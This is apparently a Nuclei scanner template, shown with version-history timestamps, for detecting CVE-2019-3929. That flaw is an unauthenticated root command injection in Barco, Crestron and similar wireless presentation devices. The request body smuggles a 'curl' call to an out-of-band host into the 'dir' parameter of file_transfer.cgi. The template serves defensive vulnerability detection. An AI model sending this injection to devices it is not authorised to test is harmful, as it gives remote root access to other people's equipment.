2021-11-05 15:28:18 +00:00
id : CVE-2019-3929
info :
2022-05-09 16:12:52 +00:00
name : Barco/AWIND OEM Presentation Platform - Remote Command Injection
2021-11-05 15:28:18 +00:00
author : _0xf4n9x_
2021-11-05 15:44:13 +00:00
severity : critical
2022-05-09 16:12:52 +00:00
description : The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
2023-09-06 12:53:28 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
2021-11-05 15:28:18 +00:00
reference :
- http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html
- https://www.exploit-db.com/exploits/46786/
- https://nvd.nist.gov/vuln/detail/CVE-2019-3929
2022-05-17 09:18:12 +00:00
- https://www.tenable.com/security/research/tra-2019-20
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/155948/Barco-WePresent-file_transfer.cgi-Command-Injection.html
2021-11-05 15:44:13 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-11-05 15:44:13 +00:00
cve-id : CVE-2019-3929
2023-11-07 07:20:43 +00:00
cwe-id : CWE-78,CWE-79
2023-10-14 11:27:55 +00:00
epss-score : 0.97419
2023-11-09 06:04:52 +00:00
epss-percentile : 0.99914
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:o:crestron:am-100_firmware:1.6.0.2:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : crestron
product : am-100_firmware
tags : tenable,cve,cve2019,oast,injection,kev,edb,rce,packetstorm
2021-11-05 15:28:18 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-05 15:28:18 +00:00
- method : POST
path :
- "{{BaseURL}}/cgi-bin/file_transfer.cgi"
2022-08-24 08:56:43 +00:00
body : "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27"
2023-07-11 19:49:27 +00:00
2021-11-05 15:28:18 +00:00
headers :
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
2023-11-07 17:58:22 +00:00
# digest: 4b0a004830460221009f0698606ff105b86533c17790b4a2091422e445363bdfc6cadafb596c5f457402210080be1894e88790fc2fc1448af3edb0d6c583796f9b19273be14e91d4fddbb141:922c64590222798bb761d5b6d8e72950